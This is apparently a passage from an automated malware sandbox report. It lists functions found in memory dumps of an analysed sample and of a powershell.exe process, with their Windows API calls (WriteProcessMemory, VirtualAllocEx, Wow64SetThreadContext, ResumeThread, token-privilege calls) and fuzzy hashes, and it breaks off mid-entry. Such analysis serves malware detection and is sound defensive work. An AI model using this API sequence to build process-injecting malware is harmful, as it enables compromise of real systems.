                                                                                            • Source File: 00000003.00000002.2151755031.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 998c26f3899d66a2c6251eef82415dcf50ad386642f8820d6d1f677075e0492f
                                                                                            • Instruction ID: 2e4d47a8ab5b90ebdfa1aedf1f415eb5730f64914a8ddbe7b480e66d1c7b05a3
                                                                                            • Opcode Fuzzy Hash: 998c26f3899d66a2c6251eef82415dcf50ad386642f8820d6d1f677075e0492f
                                                                                            • Instruction Fuzzy Hash: D12127759002499FCF10DFA9C885BDEBBF5FF88314F60882AE959A7240D7789954CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 002E45C0, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 002E4640
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2151755031.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessRead
                                                                                            • String ID:
                                                                                            • API String ID: 1726664587-0
                                                                                            • Opcode ID: c4f9f5bd26e0f489913dc6899e0a806890c03c2c7a197acb1d6c027b55871479
                                                                                            • Instruction ID: 15c0d105f0eff0cc1446ba3287c22f845ef5149fe46473a25dc7f5642daa9e9c
                                                                                            • Opcode Fuzzy Hash: c4f9f5bd26e0f489913dc6899e0a806890c03c2c7a197acb1d6c027b55871479
                                                                                            • Instruction Fuzzy Hash: C921E6B19002499FCB10DFAAC8847EEFBF5FF48314F50882AE959A7240D7789954CBA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 002E3B38, Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 002E3BB6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2151755031.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ContextThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 983334009-0
                                                                                            • Opcode ID: cb4fbb8ff377554295459372fd894ef1a181c297c583df10fb6c8f1d7560cd8e
                                                                                            • Instruction ID: 18a789137b1adee6b4bf9a804b907d37f0b6e59cf9c8d1b14ba64c0086a78c8c
                                                                                            • Opcode Fuzzy Hash: cb4fbb8ff377554295459372fd894ef1a181c297c583df10fb6c8f1d7560cd8e
                                                                                            • Instruction Fuzzy Hash: 3D211A71D102099FDB10CFAAC4847EEBBF5EF48318F54882ED559A7240D7789A45CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 002E4010, Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 002E407E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2151755031.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 0534234139581a1bb322e98f18732776a59bf9ccda0180d5ed902ae077fd839f
                                                                                            • Instruction ID: f149d910617d67e01f0ea2db07cc444135236c8eaeede5a36b20d94b087d15e9
                                                                                            • Opcode Fuzzy Hash: 0534234139581a1bb322e98f18732776a59bf9ccda0180d5ed902ae077fd839f
                                                                                            • Instruction Fuzzy Hash: 731156719002089BCB10CFAAC8447DFBBF9AF88314F20881AE619A7240C775AA10CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 002E5590, Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002E55FA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2151755031.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: 6dd554304259889f1932ca9138f173bb710cc95b405d4fc47553926bc450e0c4
                                                                                            • Instruction ID: cf1b21e19200977dfb8850c03c7387462ac8ada1237fcc8c797e964300399a89
                                                                                            • Opcode Fuzzy Hash: 6dd554304259889f1932ca9138f173bb710cc95b405d4fc47553926bc450e0c4
                                                                                            • Instruction Fuzzy Hash: 7F1179B1D002488FCB10CFAAC4443EEFBF6AF88318F20881AC559A7240C7749904CFA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 002E5598, Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002E55FA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2151755031.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ResumeThread
                                                                                            • String ID:
                                                                                            • API String ID: 947044025-0
                                                                                            • Opcode ID: f9da5ef1b932b8f568320c8d89511fc31892068b34f3aa36c60f625e47fb589d
                                                                                            • Instruction ID: f9ff82f39bbad81496847d94ea9fb6f7b7fbc5ec4ed4c81b86504fcbc0416218
                                                                                            • Opcode Fuzzy Hash: f9da5ef1b932b8f568320c8d89511fc31892068b34f3aa36c60f625e47fb589d
                                                                                            • Instruction Fuzzy Hash: 3D113AB1D106488BDB10CFAAC4447EFFBF9EF88318F64881AD519A7240C774A944CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0027D01C, Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2151648387.000000000027D000.00000040.00000001.sdmp, Offset: 0027D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 561d0b2d2ae2ee6771789d0dcb78d6253818762d5e3adcdc0f4811a0946c41d5
                                                                                            • Instruction ID: f4f6350693ddb2ec2b518c76d19241dbc05d13e563621f61a2b64cd66ce5d034
                                                                                            • Opcode Fuzzy Hash: 561d0b2d2ae2ee6771789d0dcb78d6253818762d5e3adcdc0f4811a0946c41d5
                                                                                            • Instruction Fuzzy Hash: 5E21F275614204DFCB14DF24D984B16BBB5EF84314F24C969D80D4B246C37AD827CAA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0027D006, Relevance: .1, Instructions: 62COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2151648387.000000000027D000.00000040.00000001.sdmp, Offset: 0027D000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 583c2982c4f4b2185633f4c0cca4dd7d8db8b088ea30518aa7a419d87303fee3
                                                                                            • Instruction ID: 36cb8e9b5a67d716f88206ac450f5a58c4f2b446698ebdfc585504d182c2c80e
                                                                                            • Opcode Fuzzy Hash: 583c2982c4f4b2185633f4c0cca4dd7d8db8b088ea30518aa7a419d87303fee3
                                                                                            • Instruction Fuzzy Hash: C2215B755093808FCB12CF24D994B15BF71EF46314F28C5EAD8498B6A7C33A981ACB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Analysis Process: powershell.exe PID: 2584 Parent PID: 1696 powershell.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 004CACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 004CAD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: 725f292466fc58bc6d982ccd7d35d43118a79367bc6a55518067eb972c115f2c
                                                                                            • Instruction ID: 83f9810617a66b2c9f46acb2594f71ff9b97a41d5c106537a5e0760301de7c58
                                                                                            • Opcode Fuzzy Hash: 725f292466fc58bc6d982ccd7d35d43118a79367bc6a55518067eb972c115f2c
                                                                                            • Instruction Fuzzy Hash: 5121F1761097849FEB228F25DC40F92BFB4EF06314F0884DBE9858B663D2359818CB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 004CAD37
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: AdjustPrivilegesToken
                                                                                            • String ID:
                                                                                            • API String ID: 2874748243-0
                                                                                            • Opcode ID: c786c7f9f4bbf1e8920ddad50b4a7ce03d0eb584cccb9130b6dd145bb056d11a
                                                                                            • Instruction ID: 80d1f5402a1d2e490ec8c159c04604ba9931d94877b49902289cb2f3b7d0ffd8
                                                                                            • Opcode Fuzzy Hash: c786c7f9f4bbf1e8920ddad50b4a7ce03d0eb584cccb9130b6dd145bb056d11a
                                                                                            • Instruction Fuzzy Hash: 82118C755007049FEB608F55D884B66FBA4EB04325F08C46AED4A8AA62D635E824DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CB2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 004CB329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: cee28877be4c46845ef94d6610e23fdd2296ea074a543137928bb103dc9c6c5b
                                                                                            • Instruction ID: c43253cf184fd039d198f497b85dc3e55960df12afb07ad4f00c28efa27b04df
                                                                                            • Opcode Fuzzy Hash: cee28877be4c46845ef94d6610e23fdd2296ea074a543137928bb103dc9c6c5b
                                                                                            • Instruction Fuzzy Hash: F8119E75508380AFDB228F11DC45F62FFB4EF06220F09C49EED854B662C275A818DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CB2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 004CB329
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationQuerySystem
                                                                                            • String ID:
                                                                                            • API String ID: 3562636166-0
                                                                                            • Opcode ID: 38a180dc1e5d75797339c92b2c19d032a68348e8a5fe1a1f181012ead6f9945d
                                                                                            • Instruction ID: 8e130d2cbb57e06470fdff4a1d23f1faa89a6f767c2bbeab89e3eef48278ee16
                                                                                            • Opcode Fuzzy Hash: 38a180dc1e5d75797339c92b2c19d032a68348e8a5fe1a1f181012ead6f9945d
                                                                                            • Instruction Fuzzy Hash: 7B01AD35400740DFEB608F45D886B26FFA0EF14721F18C09EDD894B662C375A818DBB2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0289096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 0289099C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 31276548-0
                                                                                            • Opcode ID: 93b9fea21f16a4160860b05a93f4c71230a4cb823fe3fbafadab03aa7ad0ec31
                                                                                            • Instruction ID: 96e78c37db808ffd3fd536038a66c4f21aa0fbff8e139a8698b4d3eee22927f4
                                                                                            • Opcode Fuzzy Hash: 93b9fea21f16a4160860b05a93f4c71230a4cb823fe3fbafadab03aa7ad0ec31
                                                                                            • Instruction Fuzzy Hash: 11F0C239904744DFEF20DF05D885765FBA0EF15726F0CC09ADD498B356D375A408CAA2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02890118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleTitleW.KERNEL32(?), ref: 028901D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleTitle
                                                                                            • String ID:
                                                                                            • API String ID: 3358957663-0
                                                                                            • Opcode ID: 948f2f7b35729aaf24554917de313c19240ae8e9c4dc7804bdb4aa877fc8206c
                                                                                            • Instruction ID: 22c195e4f4fdbab990b6b8d52c2e70f0235208752fafcabe52db2efbc18f139e
                                                                                            • Opcode Fuzzy Hash: 948f2f7b35729aaf24554917de313c19240ae8e9c4dc7804bdb4aa877fc8206c
                                                                                            • Instruction Fuzzy Hash: 2631397650E3C08FEB138B759C65691BFB4AF43210F0E84DBD884CF1A3D6259809DB62
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0289067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0289072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: 693a065b5ffc2b41d525acad8a761d3ad25005bb023f53b89a45c3016221afcc
                                                                                            • Instruction ID: 2ac339f77797e439298c430aecd9c7ccfc4aa3bebc272ac9b7cbebce6ffa297b
                                                                                            • Opcode Fuzzy Hash: 693a065b5ffc2b41d525acad8a761d3ad25005bb023f53b89a45c3016221afcc
                                                                                            • Instruction Fuzzy Hash: 64315275505340AFE721CF65CC45F56BFF8EF05610F09849EE989CB293D365A908CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02890D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 02890DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: 1299e9e43995d7cc87b6ba51ad267def4494817940b173ae8cf0a78ed65c3aa8
                                                                                            • Instruction ID: 2d74dfbb80a44e2c15030443f1bfc2932c1f20f8311e06355affa72b27e255ab
                                                                                            • Opcode Fuzzy Hash: 1299e9e43995d7cc87b6ba51ad267def4494817940b173ae8cf0a78ed65c3aa8
                                                                                            • Instruction Fuzzy Hash: F6319875509380AFE712CB25DC45B96BFE8DF06254F0884AAE988CF293D375A905C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CBD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,FDE6E641,00000000,00000000,00000000,00000000), ref: 004CBDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: 956807d77e684a354bbf4375e948abb3b6d08a532e6e2e6f3605339eca21b310
                                                                                            • Instruction ID: 457941eebd5640e9fcacb17352c7b2a2525479ddcae5a295dd4e1d950773cffb
                                                                                            • Opcode Fuzzy Hash: 956807d77e684a354bbf4375e948abb3b6d08a532e6e2e6f3605339eca21b310
                                                                                            • Instruction Fuzzy Hash: 6831B471009380AFE722CB60DC45F97BFB8EF06310F08849BE985CB192D225A908C7B1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CAF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32EnumProcessModules.KERNEL32(?,00000E9C,FDE6E641,00000000,00000000,00000000,00000000), ref: 004CAFBE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EnumModulesProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1082081703-0
                                                                                            • Opcode ID: 52ac729ba630c998dae18aaab3181a072052b7473604bd9f67ace966e94dc92f
                                                                                            • Instruction ID: 7404e4add955a5a557c065ab0fe191233add35eb9c37e1c95f898c9087b221fb
                                                                                            • Opcode Fuzzy Hash: 52ac729ba630c998dae18aaab3181a072052b7473604bd9f67ace966e94dc92f
                                                                                            • Instruction Fuzzy Hash: B821D5B2509380AFE712CB21DC45F96BFB8EF06320F0884DBE984DB193C2259949C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02890FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0289109E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationVolume
                                                                                            • String ID:
                                                                                            • API String ID: 2039140958-0
                                                                                            • Opcode ID: f117af18800002e40a1103a98c9247f778abb2a4d513a745e4ae2deafe77bb81
                                                                                            • Instruction ID: ef1daa4d0002cf4e400e2f27d5829b98ccc78af237393523b0cdfe1b0d88a497
                                                                                            • Opcode Fuzzy Hash: f117af18800002e40a1103a98c9247f778abb2a4d513a745e4ae2deafe77bb81
                                                                                            • Instruction Fuzzy Hash: 5C31617550E3C05FD3138B358C55B55BFB4AF43610F1A81DBD8848F1A3D629A919C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CB01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • K32GetModuleInformation.KERNEL32(?,00000E9C,FDE6E641,00000000,00000000,00000000,00000000), ref: 004CB0AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationModule
                                                                                            • String ID:
                                                                                            • API String ID: 3425974696-0
                                                                                            • Opcode ID: 904916ca214ab6e89efe4d671839e264e229bcd772062a0b33c6382cd7823b06
                                                                                            • Instruction ID: f2a398c270e39aa79bee634921162c98e5b3a718b37fbdec02bb844d12855db4
                                                                                            • Opcode Fuzzy Hash: 904916ca214ab6e89efe4d671839e264e229bcd772062a0b33c6382cd7823b06
                                                                                            • Instruction Fuzzy Hash: 3B219475505380AFE721CB15CC45FA7BFA8EF06310F08849BE945DB152D665A908CBB5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CA1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 004CA23E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: ConsoleCtrlHandler
                                                                                            • String ID:
                                                                                            • API String ID: 1513847179-0
                                                                                            • Opcode ID: 9964d8ca5550628ba33b0bcfd85a89cb7498c546189a5c3aa96e92b5416b30bc
                                                                                            • Instruction ID: b2a772393ee8cd945681209210ef2394da28f4a7a6693e63ec472c0fc86998dc
                                                                                            • Opcode Fuzzy Hash: 9964d8ca5550628ba33b0bcfd85a89cb7498c546189a5c3aa96e92b5416b30bc
                                                                                            • Instruction Fuzzy Hash: BB21F77140D3C06FD3128B218C55B66BFB4EF47620F0981DFD884CF293D229A819C7A2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02890784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetFileType.KERNELBASE(?,00000E9C,FDE6E641,00000000,00000000,00000000,00000000), ref: 02890819
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileType
                                                                                            • String ID:
                                                                                            • API String ID: 3081899298-0
                                                                                            • Opcode ID: 1302c1f683bda4536ba3cdc5d91872ef3c6b1b3bcd950d66781da8591bb6e931
                                                                                            • Instruction ID: b99579c1a91d74d0661f57d6d86281765e315a8fc19edceb97d020a7d0e2cef7
                                                                                            • Opcode Fuzzy Hash: 1302c1f683bda4536ba3cdc5d91872ef3c6b1b3bcd950d66781da8591bb6e931
                                                                                            • Instruction Fuzzy Hash: 07210AB6508780AFE712CB159C41FA3BFA8EF46720F0881DBF9849F193D224A909C771
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02890464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02890502
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FolderPath
                                                                                            • String ID:
                                                                                            • API String ID: 1514166925-0
                                                                                            • Opcode ID: a346c5eef461f2b3a2731428e90d43a4a54925cbc333ea06273e587417e01986
                                                                                            • Instruction ID: 7671a10b1f3839b3e6a89f36b2826cfa3ac7c373a80cbe7d2c12d97eca1252a8
                                                                                            • Opcode Fuzzy Hash: a346c5eef461f2b3a2731428e90d43a4a54925cbc333ea06273e587417e01986
                                                                                            • Instruction Fuzzy Hash: 3B216D7540E3C0AFD7128B258C55B66BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 028906AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0289072D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: a87cd1630e03353fdb99e049fb30a1f75ac50edfb9567186bbaca36c214c84ae
                                                                                            • Instruction ID: 0e53ea45f2ef9c15656e74a19b885ee6d1deca351ff65a6200e675bab1b2aaba
                                                                                            • Opcode Fuzzy Hash: a87cd1630e03353fdb99e049fb30a1f75ac50edfb9567186bbaca36c214c84ae
                                                                                            • Instruction Fuzzy Hash: D8218375500704EFEB21DF65CC45F66FBE8EF04660F188469E949CB292D772E904CB61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02890854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(?,00000E9C,FDE6E641,00000000,00000000,00000000,00000000), ref: 028908E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: d8bd98275d0b35e5ff00a7c4d887072478cd107dd9ed55489450343d9ec10592
                                                                                            • Instruction ID: 77a95c591c9e10c4ce40aa5d5724a28ecce6b076bc221b2325035cc6c0efc684
                                                                                            • Opcode Fuzzy Hash: d8bd98275d0b35e5ff00a7c4d887072478cd107dd9ed55489450343d9ec10592
                                                                                            • Instruction Fuzzy Hash: CE219276409380AFEB22CF51DC45F56FFB8EF06314F09849BE9849B193C265A909CB71
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CA8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 004CA94A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LanguagesPreferredThread
                                                                                            • String ID:
                                                                                            • API String ID: 842807343-0
                                                                                            • Opcode ID: 9e1cb9965e992ac4a3d83c063d02fcf242ee15be3838285f59bab383db94d077
                                                                                            • Instruction ID: 654e787f4b435ba834e630b8dba7300a9b4fe9b4367eb8941450cefaa1a0b1e5
                                                                                            • Opcode Fuzzy Hash: 9e1cb9965e992ac4a3d83c063d02fcf242ee15be3838285f59bab383db94d077
                                                                                            • Instruction Fuzzy Hash: 3C21A77540D780AFD3138B25DC51B62BFB4EF87B10F1981DBE8848B653D225A919C7B2
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02890D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegisterEventSourceW.ADVAPI32(?), ref: 02890DD6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2102258305.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: EventRegisterSource
                                                                                            • String ID:
                                                                                            • API String ID: 1693822063-0
                                                                                            • Opcode ID: 218ec3406cd4f9747b6c3c1d891e58baae571d93cc1a2e65f22f0d6ae9936bce
                                                                                            • Instruction ID: d480f4828635906ec771afca8afbd3e250917b3997d059b838ab12bc5173a583
                                                                                            • Opcode Fuzzy Hash: 218ec3406cd4f9747b6c3c1d891e58baae571d93cc1a2e65f22f0d6ae9936bce
                                                                                            • Instruction Fuzzy Hash: 7621A175600304AFFB20DF29CC85B6AFBD8EF04654F08856AE948DB282D775F804CA61
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004CBD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTokenInformation.KERNELBASE(?,00000E9C,FDE6E641,00000000,00000000,00000000,00000000), ref: 004CBDBC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.2097326815.00000000004CA000.00000040.00000001.sdmp, Offset: 004CA000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InformationToken
                                                                                            • String ID:
                                                                                            • API String ID: 4114910276-0
                                                                                            • Opcode ID: a7e1d02cddc6745d2219d353888d8e99ef3be41e6c9fd27fa992f4012bf154cd
                                                                                            • Instruction ID: a958852a7ed95b2b47e9534c356685fbb2c39cf79e9801b55fbff61ce0387151
                                                                                            • Opcode Fuzzy Hash: a7e1d02cddc6745d2219d353888d8e99ef3be41e6c9fd27fa992f4012bf154cd
                                                                                            • Instruction Fuzzy Hash: 1F11DF76100700EFEB21CF61DC85FABFBACEF04720F14846AF945CA241D634A9048BB5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 02890F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDriveTypeW.KERNELBASE(?), ref: 02890FB0
                                                                                            Memory Dump Source
